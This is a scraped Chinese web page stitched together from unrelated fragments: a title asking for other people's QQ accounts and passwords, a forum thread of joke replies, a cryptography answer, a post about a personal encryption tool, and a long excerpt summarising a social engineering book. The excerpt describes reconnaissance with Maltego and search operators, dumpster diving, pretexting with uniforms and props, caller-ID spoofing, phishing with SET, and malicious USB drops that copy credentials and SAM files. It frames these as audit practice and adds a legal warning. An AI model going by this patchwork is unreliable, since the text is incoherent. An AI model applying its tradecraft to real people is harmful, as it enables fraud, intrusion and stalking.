求一些不用的qq号和密码,十分感谢 英文QAQ

&&&&&话题页
回应/阅读:63/957
【浅汐、 转】你的QQ号会笑死人的!!!
TA们刚刚顶过
13:30:47.0
大家粉我可好,24小时内随时互粉哦~
13:36:46.0
在健身房摸电门不小心摔个跟头
20:09:37.0
我在下水道耍大刀突然疯了。日......
14:16:23.0
在健身房吃骨头突然笑死了(算比较正常的吧.............
14:22:24.0
大家粉我可好,24小时内随时互粉哦~
13:38:39.0
是抢的钱太多了精神出问题了么???
19:26:11.0
13:39:27.0
在厕所发飙突然间变成了猪
13:35:44.0
下水道里。。。
17:58:50.0
22:56:16.0
大家粉我可好,24小时内随时互粉哦~
16:13:39.0
没错,你真的好正常!
19:00:37.0
我爱翻唱泛滥但超有爱的乐圈、我爱一年四季不间断超级活跃的春风、
17:12:30.0
uuu这么正常
19:27:52.0
这个非常正常,真的!!
19:27:57.0
16:55:26.0
17:14:26.0
19:28:07.0
19:28:11.0
18:32:13.0
-微雨清寒声声慢.
19:38:00.0
她依旧在长安的人流中叫喊着。“拐个二少回家当老婆。”“不知我如何?”他好看的眸子微微一眯,嘴角荡出一丝笑意。
19:46:46.0
对这两个表示无力吐槽,太无厘头了
18:08:39.0
20:23:29.0
19:49:09.0
让小空用爱心感化你们吧。
18:25:21.0
有可能被店到了
18:38:05.0
18:48:53.0
表哭,这种事这只是个玩笑而已,不素真的
21:08:40.0
- 【独向浮生,漓人不悔。 &即使孤独一生、也不后悔遇见你&。】 -
13:07:20.0
我不期望他们有多帅 &我不期望他们唱歌有多好 & 我不期望他们跳舞有多霸气我只是…… & & &想让他们三个回来 &想让他们一起一个不差的让我看到毕竟 & &我是行星饭 & 我是EXO-L
14:43:36.0
15:17:19.0
UFO真的有那么废
19:15:05.0
话说本人已经有一年没来圈圈的说。。。不过,2015,俺回来鸟~~请无视我2014年发的所有所有东东!!
19:40:59.0
23:46:27.0
正常的有些不正常了
10:14:13.0
呃...........
13:14:12.0
难道不素吗?
18:26:58.0
21:43:16.0
10:20:01.0
在我的面前绝望吧!!!!
13:08:27.0
13:12:50.0
[在你面前每一次呼吸就像是渡过漫长的冬季。] & & & & & &
& & & & & & & & & & & & & & & &
11:54:50.0
& & & & & & & & & & & & & & & & & & & & 签名档 & & & & & & & & & & & & & & & & & & & & & &
22:20:41.0
回应/阅读:63/957
使用签名档
没有多多号?
那年的薰衣草还在吗?...
任凭世事百转千折,不改初衷。【互粉,不回撤。欢迎处友这儿夏安w】
将荣耀与屈辱统统忘记
钻石军长驾到!
沉溺于夏天☆推荐到广播
28833 人聚集在这个小组
(WasabiMao1181)
(LivioLee92)
第三方登录:我们在一起没有结果的......
我们在一起没有结果的......
我想很多人对于密码学都有一个误区。&br&&br&加密的安全性,并不是依靠一个别人不知道的加密算法来保证的。事实上,你自己设计的以为别人不知道就万事大吉的加密算法,很可能在一些地方存在着漏洞,在安全性的设计上也没有经过充分的验证和考量,其实是更加容易被破解的。&br&&br&而现实中使用的加密,实际上都是公开的加密算法。这些算法经过广泛的验证和评议,安全性是有足够的保证的。而这样的加密的安全性的保证,是密钥的安全性。不知道密钥就无法将其解密(暴力破解需要的计算资源和时间都非常爆炸)&br&&br&关于苹果所使用的端到端加密方案其他几位答主说的很清楚了。只要苹果没有在系统里面留后门,那么用户设置的密码进行的加密,就真的是连苹果自己都无法破解的。&br&&br&关于密码学的更多东西欢迎参看水木看山专栏发布的一系列密码学的文章(我是作者之一)&br&&a href=&/p/?refer=c_& class=&internal&&数学中的战争,战争中的数学——漫谈密码(1) - 水木看山 - 知乎专栏&/a&&br&&a href=&/p/?refer=c_& class=&internal&&数学中的战争,战争中的数学——漫谈密码(2) - 水木看山 - 知乎专栏&/a&&br&&a href=&/p/?refer=c_& class=&internal&&数学中的战争,战争中的数学——漫谈密码(3) - 水木看山 - 知乎专栏&/a&
我想很多人对于密码学都有一个误区。 加密的安全性,并不是依靠一个别人不知道的加密算法来保证的。事实上,你自己设计的以为别人不知道就万事大吉的加密算法,很可能在一些地方存在着漏洞,在安全性的设计上也没有经过充分的验证和考量,其实是更加容易被…
&a data-hash=&17f5c7b9b7c9b7ec6e43eb5& href=&///people/17f5c7b9b7c9b7ec6e43eb5& class=&member_mention& data-tip=&p$b$17f5c7b9b7c9b7ec6e43eb5& data-hovercard=&p$b$17f5c7b9b7c9b7ec6e43eb5&&@Edward Lee&/a& 答案正解。&br&&br&这是丹布朗《失落的秘符》里面用到的密码,原型是这样。&br&&br&&img src=&/f94d9ecaf52feba_b.jpg& data-rawwidth=&182& data-rawheight=&181& class=&content_image& width=&182&&&br&&br&比如前三个,就是ZHE
答案正解。 这是丹布朗《失落的秘符》里面用到的密码,原型是这样。 比如前三个,就是ZHE
网络安全中的&b&『社会工程学』&/b&,必然会引起热议&br&它再也不是小众的论题了,&br&因为事关每个人的安全&b&,互联网时代没有隐私,大家都是在裸奔&&/b&&br&先看下最近时期的大尺度新闻&a href=&///?target=http%3A///1/323/323521.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&《疯狂来往》陷入艳照门 网友疯狂围观&i class=&icon-external&&&/i&&/a&&br&再更具体的认识一下&a href=&///?target=http%3A//.cn/i//.shtml& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&评论:网络“社会工程学”里没有隐私&i class=&icon-external&&&/i&&/a&&br&可以参考百度百科&a href=&///?target=http%3A///view/118411.htm%3Ffr%3Daladdin& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&社会工程学_百度百科&i class=&icon-external&&&/i&&/a&&br&&br&这个视频是安全意思的至尊经典,请看完后,再阅读后面的文字描述&br&&a href=&///?target=http%3A///u45/v_NzYwOTM4OTg.html/1030_humormaster.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&别让网络泄露你的隐私&i class=&icon-external&&&/i&&/a&&br&&a class=&video-box& href=&///?target=http%3A///u45/v_NzYwOTM4OTg.html/1030_humormaster.html& target=&_blank&&
&img class=&thumbnail& src=&/images/21/_hd.jpg&&&span class=&content&&
&span class=&title&&别让网络泄露你的隐私&span class=&z-ico-extern-gray&&&/span&&span class=&z-ico-extern-blue&&&/span&&/span&
&span class=&url&&&span class=&z-ico-video&&&/span&/u45/v_NzYwOTM4OTg.html/1030_humormaster.html&/span&
&/a&&br&&br&好了,我并不是一枚 社攻狮&br&但是在这里普及一下相关的内容还是可以的&br&国外最好的著作是 &b&&社会工程--安全体系中的人性漏洞&&/b&&br&国内也有一本很不错的书--&b&-&社会工程学攻击2&&/b&,第一部是&社会工程学档案袋&但是有点过时了&br&&br&&b&在此我把 国外书中的精彩论述摘抄如下&/b&&br&&br&&p&以个人经验来看,不管事情看似多么不可能,&b&几乎总会有一种巧妙的、意想不到的解决方法&/b&&/p&&p&简单而致命的攻击每天都在发生,所以人们需要掌握知识、改变密码策略、改变远程服务器的访问方式,还需要在面试、交付、雇用和解聘员工方面改变思路。如不具备知识,也便没有改变的动力。&/p&&br&&p&&b&真正的社会工程不仅是以为自己在扮演角色,而且在那个时刻,你就是那个人,你就是那个角色&/b&,你的生活就是那样的将这些知识和开锁匠、&b&使用隐秘摄像机的间谍、专业信息收集人员的技巧相结合,你会成为一个才华出众的社会工程人员&/b&&/p&&br&&p&我继续说到人们经常选择最简单的“安全问题”,例如“你(或你母亲)的闺名”,而这些信息通过因特网或者几个虚假电话就可以轻易获得。一个问询电话或者简单的网络搜索就能够找到生日和纪念日信息&/p&&p&收集这些信息使销售人员可以在“熟人介绍”的情况下拜访客户,并能够迅速获得对方的信任&/p&&br&&p&我通常为不同类型的数据建立不同的BasKet,例如域名查询信息、社交媒体信息等。然后,&b&使用谷歌地图或谷歌地球获取目标客户的建筑和设施图片,保存BasKet&/b&&/p&&p&其中有很多有用的信息和标签&/p&&p&我收集的信息包括&b&目标客户的网站内容、域名查询信息、社交网络、&/b&&b&图片、员工联系方式、简历、论坛、爱好&/b&等一切可能与目标公司相关的信息&/p&&p&其中就有两个特别适用于信息收集和存储的工具,一个是Dradis,另一个为BasKet&/p&&p&&b&公司或者个人网站是信息的重要来源&/b&&/p&&p&如果你在LinkedIn或者Facebook中找到一名员工,很有可能他的好几个同事也在其中。集这些数据,可以更加清楚地分析这家公司以及它的员工。&/p&&p&很多员工会在社交网站上用标签的形式展示自己的职位,这可以令社会工程人员勾勒出公司某个部门的规模以及组织架构。&/p&&br&&p&&b&谷歌中记录了很多你认为已经删除的数据,就如同大型数据库一般。只要设定好查询方式,&/b&&b&就能得到你想要的信息&/b&&/p&&p&例如, 在谷歌搜索框中输入site:&a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& filetype:pdf,就能得到&a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&网站上的所有PDF文档列表。&/p&&p&熟知搜索语法可以帮助你找到和目标相关的信息,这对信息收集来说很重要。我习惯于使用语法(类似于filetype:pdf)来检索PDF、DOC、XLS和TXT文件。当然,员工留在服务器上的DAT和CFG文件以及其他数据库和配置文件等也是值得收集的信息不过重点是懂得谷歌提供的各种操作符可以帮助你创造出属于自己的搜索语法&/p&&p&Whois能提供域名数据库查询服务。Whois数据库中有很多有价值的信息,有些时候甚至包&/p&&p&括网站管理员完整联系方式&b&很多人都没意识到智能手机拍摄的照片会隐藏GPS信息&/b&&/p&&br&&p&&b&不同种类的信息可以帮助你全面地了解目标。人们喜欢在Twitter上分享自己的地理位置、和谁在一起以及正在做的事情等。Blippy①能绑定人们的银行账号,然后向好友推送你的每笔消费信息,包括从哪里购买、花费多少等。含有地理位置信息的照片,以及Facebook这种用来分享个人照片、故事和其他相关信息的社交网站,是社会工程人员特别喜欢的信息源。只需片刻功夫,目标人物的住址、工作、照片、兴趣等信息就呈现在眼前了&/b&&/p&&p&&b&社交网站成为最佳信息源的另一个原因是可以匿名伪装&/b&&/p&&p&&b&公开数据可能来自目标企业内部或者外部,包括季度报告、政府报告、分析报告及公开交易&/b&&/p&&br&&p&公司的收入信息等。例如,邓白氏集团(Dunn and Bradstreet)以及其他公司的销售分析报告都能以极低的价格买到,而这些报告中通常会包含目标公司的大量详细信息。&/p&&p&上面仅仅是通过观察可以得出答案的几个问题而已。&b&花上一段时间观察目标,并用隐藏式摄&/b&&b&像机录制下来,然后回去慢慢研究和分析,你会学到很多知识并且你的信息量也会暴增。&/b&&/p&&p&&b&翻找垃圾箱是一种快速收集所需信息的方法&/b&。&/p&&br&&p&不过,翻垃圾箱时一定要记住以下几点。穿质量好的鞋子或靴子。没有比跳进垃圾堆,然后被钉子戳到脚更令人抓狂的事了。确保你的鞋子合脚且鞋带系紧了,并能保护脚不为利器所伤。穿深颜色的衣服。这点不需要过多的解释。你肯定会穿那些丢掉也不会心疼的衣服,而且深色的衣服不容易被发现。带一个手电筒。拿到了赶紧溜。除非你是在偏僻到不可能被抓到的地方,否则最好是拿走一些垃圾袋,到其他地方去翻找。&/p&&br&&p&WYD这样的工具可以将个人或者公司网站上的信息收集起来,根据网站上涉及的词语来创建可能的密码列表。人们通常会使用文字、姓名或者日期作为密码。这种类型的软件能够轻而易举地生成密码列表【字典】&/p&&br&&p&作为一名社会工程人员,信息收集完成后,必须开始规划如何攻击。为此,首先要建立模型,列出信息使用攻略。&b&交流模型的建立便是最佳的开始方式之一。&/b&&/p&&br&&p&如何有效地使用这些要素呢?运用交流模型的第一步是带着目的动手实践,首先从社会工程中上演的经典剧情开始。编写一个网络钓鱼邮件,尝试让25~50个雇员在工作时间访问一个嵌有恶意代码的非商业网站,以达到入侵其公司网络的目的&/p&&br&&p&&b&登门拜访,伪装成一个前来面试的人员,&/b&装作不小心将咖啡洒在了简历上,并说服前台工作人员允许你用USB存储器插入到电脑里重新打印一份。&/p&&br&&p&如何发送钓鱼邮件?!是让前台接待员接受你的带有恶意程序的U盘。在U盘插入电脑后,该程序会自动加载并提取系统中所有与账户相关的信息,比如用户名、密码、电子邮件账户以及包含系统中所有账户密码的SAM文件等,然后将这些数据复制到U盘指定诱导的效果如此之好的原因如下:&/p&&p&&b&大部分人希望看上去比较有礼貌,尤其是对陌生人;&/b&&/p&&p&&b&专业人士希望自己看起来见多识广、很有才气;&/b&&/p&&p&如果得到赞赏,大部分人通常会越说越起劲并泄露更多的秘密;&/p&&p&大部分人不会为了撒谎而撒谎;&/p&&p&大部分人对貌似关心自己的人会比较友善&/p&&br&&p&&b&再看另外一个非常简单的例子。一个朋友走过来说道:“我告诉你一件特别有趣的事情。你会怎么反应呢?可能在他说出之前你就开始微笑了,你期待一个好玩的故事,所以在等待一个大笑的契机。他对你进行了铺垫,使你对幽默故事无限期待&/b&&/p&&br&&p&铺垫本身就是一种技巧。以一种隐晦或婉转的方式植入想法或思路,比诱导本身更需要技巧。&/p&&br&&p&根据目标的不同,特别简单的铺垫可能就是找出对象开的是哪个品牌的车或者其他一些看似无关紧要的信息。你可能“碰巧”与目标处于同一家熟食店,于是开始一次随意的聊天表达共同兴趣是诱导的一个重要方面。在上面的特殊情境里,甚至比“唤醒自我”更加有效,因为它迅速拓展了关系,超越了初始交流范畴&/p&&br&&p&在挖掘秘密方面没有比酒精更有效的东西,这一点很悲哀,但却是事实。&b&如果在上述5个场景中加入酒精元素,则效果会放大10倍你也可以在社会工程活动中采用诱导&/b&&b&术。&/b&所有的答案并非来自同一个地方。你可能从某人口中得知有关日期和地点的信息,然后使用这一信息从他人口中诱导出更多的信息,以此不断深入,直到得到全部的信息&/p&&br&&p&&b&在互联网上,你可以随心所欲地装扮成任何人&/b&。&/p&&p&这种伪装技术多年来一直被恶意黑客用来攫取利益,而且不仅限于互联网。&/p&&br&&p&无论去什么地方,都要是所扮演的角色。此外,很多专业社会工程人员具有多个在线身份、社交网站的身份、电子邮件和其他账户,可供伪装的时候用。&/p&&br&&p&&b&学会用不同的方言与人沟通会给人留下深刻的印象&/b&&/p&&br&&p&这里想说明的是,电话仍然是一种非常强大的社会工程工具,不该因为互联网的非人格化性质而减少对它的使用。如果没有一组人陪着你训练或磨练这些技能,你必须得有创造力。试一试给家人或者朋友打电话,看看你能在多大程度上操控他们。另一种练习方法是给自己录音,就像在打电话一样,然后重放一遍看看听起来如何。&/p&&br&&p&如果我想假装是在一个忙碌的办公室里给你打电话,我可以到&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Thriving Office&i class=&icon-external&&&/i&&/a&下载一段音频。&/p&&p&此外,伪造电话号码欺骗要相对简单一些像&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Caller ID Spoofing, Voice Changing & Call Recording&i class=&icon-external&&&/i&&/a&提供的服务或者一些自制的方法,都可以帮助社会工程人员改变来电显示的电话号码,让目标认为你是从公司总部、白宫或者当地银行打过来的。&/p&&br&&p&&b&利用这些服务可以伪造出世界上任何地方的电话号码&/b&&/p&&br&&p&现在我用以前审计过程中使用过或看见过的例子将上面几点结合起来。通过打电话的良好诱导,一名社会工程人员知道了公司所用的清洁公司的名字。通过网上搜索,他找到了能打印出来的清洁公司的标识。有很多本地或者网上商店可以按照客人的要求将标识印在衬衫或帽子上。简单的伪装,穿着有标识的衣服,带着“工具”(如写字板),并且故事情节简单而又好记。正是它的简单性和缺少细节使得这次伪装更加令人信服,进而发挥作用&/p&&br&&p&&b&伪装时还有其他一些可利用的工具。&/b&&/p&&br&&p&&b&道具有助于让目标相信你的伪装。比如,车&/b&&b&辆的磁性标志、配套的制服或装备、工具或者其&/b&&/p&&p&&b&他手提设备,还有最重要的——名片。,&/b&&/p&&br&&p&&b&微表情&/b&这一话题就是以世界著名的心理学家和研究学者保罗·艾克曼博士的研究成果为基础的,他利用自己的天赋开发出的解读人们面部表情的技术,改变了司法人员、政府官员、医生以及普通人与他人交往的方式。&b&神经语言程序学的鼻祖理查德·布兰德勒(Richard Brandler)和约翰·葛瑞德(John Grinder)提出的一些理论,改变了人们对思维模式和语言重要性的认识&/b&。这些都是相当具有争议的领域,本章将揭开其神秘面纱,并且讲解其在社会工程中的应用。&/p&&br&&p&缓冲区溢出通常是由黑客编写的程序,通过宿主程序的正常使用,可以利用它执行通常带有恶意目的的代码。一旦运行起来,程序会按照黑客预先设定好的步骤执行任务。&/p&&br&&p&也许你可以戴一个大的、闪亮的银戒指,谈话时不断地打手势,也许你会看到戒指引起了他的注意。他会不会感兴趣地伸手触摸,甚至想要拿在手里仔细看看?动觉思维者遇到这种东西会很想触摸你还得明白人们在日常生活中是如何作决定的。&b&人们所作出的大部分决定都是下意识的,如怎样开车上班、冲咖啡、刷牙及穿什么衣服等都没有经过真正的思考&/b&&/p&&br&&p&NLP实践人员要学会引用。他深知演讲者以故事和引用的方式去传达信息会更为有效。多读、多用引用,然后将指令嵌入其中,是对该技术的一种极致应用。&/p&&br&&p&回报是一种固有的期望,指的是在他人对你好的时候你会给予友善的回应。举个简单的例子:&/p&&p&当你走进一幢大楼的时候,如果有人为你开门,他会期望你对此表示感谢并且希望你报之以李,&/p&&p&能为他打开下一扇门&/p&&br&&p&&b&1. 送出某样东西&/b&&/p&&p&你送出的不能是完全没有用的东西,必须是有价值的东西。假设送出的是一本精装小说,但&/p&&p&是接收方不收集或阅读该语种的书,这样做就徒劳无功。&/p&&p&送出的可以是一项服务、一件物品、有价值的信息、帮助或者任何接收方认为有价值的东西,&/p&&p&甚至简单到为对方开门或者拣起一件掉落的物品&/p&&p&经济学的基础就是对那些可供选择的资源进行分配。这种分配由待分配物的稀缺性驱动,&/p&&p&资源越稀少,物品的感知价值就越高。这也是黄金比食盐值钱得多,而食盐比黏土值钱得多的因。&/p&&br&&p&社会工程人员可以在&b&利用信息的稀缺性&/b&时说:“我不能说这个,但是……”也可以说:“我不&/p&&p&确定你是否听过这个消息,但是我听说……”以严肃的语调说出这样的句子意味着信息很难得&/p&&p&人们更愿意听从他们眼中的权威人士的指导或建议。&/p&&br&&p&要找到足够自信、敢于直接质疑权威的人是很难的有这种权威。作&b&为社会工程人员,伪装成执法人员或者其他政府官员通常是违法的,不过伪装成保安、银行保安或者其他类型的具有执行权威的人就没问题,&/b&也常用于社会工程实践。&/p&&br&&p&在西方国家,三种权威符号特&/p&&p&别有效。可以用下面三种符号之一来获得别人的顺从(没有其他证据表明他是权威)。&/p&&p&&b&头衔&/b&&/p&&p&&b&衣服&/b&&/p&&p&&b&汽车&/b&&/p&&p&我不敢相信自己真的可以看懂这封邮件。这就是人类大脑不可思议的能力。根据剑桥大学的一项研究,单词中的字母顺序并不重要,唯一重要的是首末字母要正确。就算其他字母完全混乱,你也可以看懂&/p&&br&&p&&b&2.物理安全
&/b&&/p&&p&&b&是指企业或个人为保障安全所采取的不涉及计算机的措施,通常涉及锁、摄像机及&/b&&/p&&p&&b&窗户传感器等工具。【想一想还可以延伸到其他一些什么】懂得物理安全并知晓其运作原理是成为优秀社会工程人员的前提之当然,在收集目标信息的时候,拍摄或记录需要打开的锁的类型、品牌和具体型号,也是个不错的主意。&/b&&/p&&br&&p&了解这些信息能够为你的社会工程实践做好铺垫。&/p&&p&许多公司开始采用射频识别(RFID)、磁卡或其他类型的电子准入技术,这可能让人觉得开锁技术已经过时了。实则不然,锁还在用通过一些简单的手法就可逃过摄像头的法眼,比如用LED强光照镜头或者用帽子或头巾遮住面部。&/p&&p&录音设备的形状和大小各异。我有一个小型录音器,是一支可以使用的钢笔。该装置恰好能放在胸前的口袋里,清晰记录声音的范围可达20英尺(约为6.1米)远。加上2GB的内存,&/p&&p&&b&我可以轻松地记录数小时的谈话,然后进行分析。可以找到形状像纽扣和钢笔的摄像机,它们可以隐藏在笔尖、时钟、泰迪熊玩具、假的螺帽和烟雾报警器中,基本上能想到的任何设备都可以隐藏摄像机&/b&&/p&&br&&p&信不信由你,这条领带隐藏着全彩摄像头,使用12伏电源,并连接一个小型录制设备。戴着这条领带进行社会工程审计,绝对可以录制70度视角以内的一切事物&/p&&br&&p&&b&3. GPS跟踪器数据分析【百度云 GPS跟踪】&/b&&/p&&br&&p&&b&跟踪器&/b&采集的数据对社会工程人员大有裨益。如果能够跟踪到目标公司的CEO每次喝咖啡的地方、最喜欢的商店以及健身会所等信息,将有助于社会工程人员作出成功率最高的攻击计划。&/p&&p&收集和分类信息可能是很多社会工程人员的薄弱环节。如果存在一个工具,它可以同时对一&/p&&p&个域名、IP地址,甚至是一个人进行几十种搜索;能提示各项信息的权重,显示信息重要与否;&/p&&p&有一个GUI界面,可以用不同颜色表示不同的对象&/p&&br&&p&我首先打开Maltego。通过该公司的域名,提取所有网站页面和Whois数据库中的电子邮件地&/p&&p&址,这是个很好的信息基础。然后我深入查看这位CEO的电子邮件是否在其他网站或链接中使用&/p&&p&过。我发现他给当地的一家餐厅写了一些评论,并公开了他的电子邮件地址。同样,他在对另一&/p&&p&个州的一家餐厅的评论中也给出了电子邮件地址。从评论中可以发现,他去这个州探亲时去过这&/p&&p&家餐厅,评论中甚至提到了他兄弟的名字。使用Maltego做进一步调查,我找到了他父母和兄弟&/p&&p&在这一地区的住址。通过对姓氏进行搜索,我找到一些新的链接页面,其中提到了他在那里创业时使用的另一个邮箱,以及他与当地教堂发生了矛盾,而后转到了另一家教堂。随后,我发现他&/p&&p&Facebook上链接的一篇博文,其中有他们一家人在观看完最喜欢的球队比赛后的一些照片。下面是我花了不到两小时的时间&/p&&br&&p&社会工程人员花费了大量时间来完善自身的技能,然而,许多攻击方式需要通过创建附加恶&/p&&p&意代码的邮件或PDF文档来实现&/p&&br&&p&这个工具让社会工程人员点击几下鼠标就能创建PDF文件、电子邮件及网站等,这样就可将注意力集中到社会工程中的社会”这部分上来了。&/p&&p&社会工程审计人员使用SET可以创建有针对性的电子邮件对客户进行测试,然后记录有多少&/p&&p&雇员上当了。这个信息随后可用于培训,以帮助员工识别和避免这些陷阱。&/p&&br&&p&使用SET进行鱼叉式网络钓鱼攻击,选择选项1。选择1后,会看到如下几个选项:&/p&&p&执行群发邮件攻击&/p&&p&创建一个文件格式负载&/p&&p&创建一个社会工程模板&/p&&br&&p&要进行邮件式钓鱼攻击,选择第一个选项。第二个选项用于创建一个恶意的PDF或其他文件,&/p&&p&以备作为邮件附件发送。第三个选项用以创建模板,待日后使用。&/p&&p&&b&篡改来电显示&/b&&/p&&p&来电显示在商务和家用电话中都已成为一项普遍的技术,特别是在当前手机普遍取代固定电&/p&&p&话的情况下,来电显示已成为日常生活的一部分。成功的社会工程人员必须意识到这一事实并且&/p&&p&知道如何加以利用&/p&&br&&p&通用用户密码分析工具(Common User Password Profiler,CUPP)使得密码分析工作更加简单。&/p&&p&Muris Kurgas,或称为j0rgan,开发了这个神奇的小工具。它是包含在BackTrack渗透测试工&/p&&p&具中的一个脚本,也可以通过&a href=&///?target=http%3A//www.social-engineer.org/cupps.tar.gz& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&social-engineer.org/cup&/span&&span class=&invisible&&ps.tar.gz&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&下载。【字典】&/p&&p&在社会工程活动中使用电话时,可以篡改来电显示甚至变换说&/p&&br&&p&&b&话的声音【变声软件】&/b&&/p&&br&&p&我希望读到这里的人也可以想想自己是如何通过电话泄露信息的。骗子和诈骗专家用许多方&/p&&p&法窃取老年人、经济困难的人和其他人的信息。打电话仍旧是一个强有效的方式。充分认识厂商、供应商和银行的政策,了解他们会不会通过电话询问信息,可以帮你避免掉入许多陷阱。例如,许多银行在政策中申明他们永远不会通过电话询问社保号码或银行账号。知道这些有助于你保护自己,以免被骗而变得一贫如洗。&/p&&br&&p&网络钓鱼攻击 有针对性的邮件攻击,查看员工是否容易受到恶意邮件攻击。&/p&&p&现场伪装攻击 选择精确且可控的伪装,然后进行电话或面对面攻击,测试员工是否容&/p&&p&易上当受骗。&/p&&p&&b&引诱 一种在设法进入目标建筑物或其他设施后的现场攻击&/b&,将包含恶意代码和文件的U盘或DVD光盘放在现场,测试有没有人上钩。&/p&&p&【故意 掉下名片 或是 U盘,有木马 或个人信息】&/p&&br&&p&&b&尾随&/b& 一种现场攻击,审计人员试图尾随一群公司员工混入大楼。&/p&&p&物理安全(红队) 试图通过物理方式进入办公室,获取公司有价值的资产或信息。&/p&&br&&p&9.7.2 收集与组织信息的重要性&/p&&p&我觉得信息收集的重要性再怎么反复强调也不为过。每一个社会工程项目的质量、专业性以&/p&&p&及成功正是取决于信息收集的水平。网络是浩瀚无边的信息源。公司会将财务记录、员工的姓名和职位、联系信息、公司的照片、安全规章、合同、厂商和供应商的名字、人们的个人资料等都发布到网上。员工和普通人也会将私人的照片、地址、购买的东西、租约、合同以及喜欢的食物、队和音乐等信息放到网上&/p&&br&&br&&b&题外话&/b&
社会工程学中,有这段描述&br&一切通过各种渠道散布、传播、教授黑客技术的行为都构成&a href=&///?target=http%3A///view/599314.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&传授犯罪方法罪&i class=&icon-external&&&/i&&/a&,如出版的《黑客社会工程学攻击2》已被公安机关网安部门所关注,予以打击;一切使用黑客技术犯罪的行为都将受到法律严厉制裁,请读者慎用这把“&a href=&///?target=http%3A///view/1279810.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&双刃剑&i class=&icon-external&&&/i&&/a&”。&br&&br&&b&我可不希望被查水表,希望大家提高自己的安全意识,并从中学会真正的观察分析及其他&/b&&br&&br&&p&&b&你能够提高自己读懂他人的能力,并能和周围的人进行更加有效的沟通。不要仅将它们运用在安全实践之中,要运用于生活的各个方面,这会改变你的生活。社会工程是一门真正的艺术。尽情享受它吧!&/b&&/p&
网络安全中的『社会工程学』,必然会引起热议 它再也不是小众的论题了, 因为事关每个人的安全,互联网时代没有隐私,大家都是在裸奔" 先看下最近时期的大尺度新闻 再更具体的认识一下 …
安利一下一个小工具 dopass 只是一个从php里扒窃的异或加密算法 但是结合lastpass 变成了放心的信息记录工具&br&算法源码&br&&a href=&///?target=http%3A//git.oschina.net/splot/dopass& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&splot/dopass&i class=&icon-external&&&/i&&/a&&br&这是lastpass版本的&br&&a href=&///?target=http%3A//git.oschina.net/splot/dopass/tree/lastpass_v3.2/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&splot/dopass&i class=&icon-external&&&/i&&/a&&a href=&///?target=https%3A///del-xiong/dopass& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&GitHub - del-xiong/dopass&i class=&icon-external&&&/i&&/a&&br&之所以做这个工具是因为作为一个有强迫症的程序员,不太放心把数据放到别人的服务器,就算是他们说加了密的也不行,所以只有自己手动加密了。&br&我把lastpass里面的密码和笔记字段都加了密处理,实际效果如图&br&&img src=&/14c62c7614de799b23d1_b.jpg& data-rawwidth=&642& data-rawheight=&106& class=&origin_image zh-lightbox-thumb& width=&642& data-original=&/14c62c7614de799b23d1_r.jpg&&改进之后,使用lastpass更放心了,也不怕信息被别人看到,毕竟每次登录网站要手动输入密码(不过现在还需要进入账号管理界面输入解密key然后把密码复制过来,计划以后改为直接登录时输入key直接填写)&br&&br&现在不但用lastpass存储网站密码,还用来记录各种个人信息,比如社保账号 银行卡账号 信用卡密码等等,也从来不担心,反正加了密之后是这样的&br&&img src=&/ad96c6c0d4fa_b.jpg& data-rawwidth=&611& data-rawheight=&149& class=&origin_image zh-lightbox-thumb& width=&611& data-original=&/ad96c6c0d4fa_r.jpg&&&br&目前的问题是手机端的问题,由于自己加了密,就算购买了lastpass的付费版也需要手动解密,所以自己写了个脚本把lastpass的密码库导出后生成加密文件,然后手机端就可以使用dopass直接解密了,也不用购买lastpass,但需要手动更新还有一些坑所以没有发布源码
安利一下一个小工具 dopass 只是一个从php里扒窃的异或加密算法 但是结合lastpass 变成了放心的信息记录工具 算法源码
这是lastpass版本的
之所以做这个工具是因为作为一个有强迫症的程序员,不太放心…
保险柜拿到手就能强行打开 &br&哇保险柜好不安全啊QAQ &br&&br&打开机箱就能拆硬盘读取数据 &br&哇硬盘好不安全啊QAQ &br&&br&拆下手机的闪存就能慢慢破解加密数据 &br&哇手机的加密好不安全啊QAQ &br&&br&防盗门的锁头轻易就能撬开 &br&哇防盗门好不安全啊QAQ &br&&br&进入服务器机房就能破坏服务器 &br&哇服务器好不安全啊QAQ &br&&br&见到我就可以拐跑我 &br&哇我也好不安全啊QAQ&br&-----------------&br&啊啦~&br&我还是打个比方吧。&br&&br&首先呢,我们把电脑视作保险柜。&br&这个保险柜是全电子的,用密码解锁。&br&我们用电脑的时候就像是打开了保险柜,但是守着保险柜,其他人不敢来偷东西。&br&&br&好了,那么用 PE 破解密码(准确地说是&b&覆盖了原来的密码&/b&)就相当于把保险柜的电子模块替换掉。&br&&blockquote&&i&(类似于用电脑上的另一个管理员账户更换其他账户的密码,尝试过的朋友会发现,更换的时候会有提示,主要是讲这个账户的所有个人证书以及加密文件等将无法使用,这是因为这些文件使用了账户的密码作为密钥加密,覆盖账户密码将导致这些文件在知道密码之前都无法解密)&/i&&/blockquote&打开机箱拆出硬盘读数据就相当于砸破保险柜。&br&除此之外还可以把整个保险柜拐走w&br&&br&那么保险柜究竟安不安全?&br&答案是显然的:安全,但是是在一定的前提下。&br&&br&都可以让别人物理接触保险柜了,保险柜的安全性必定大幅下降。&br&-----------------&br&此外,以前饱受大家诟病的 Chrome 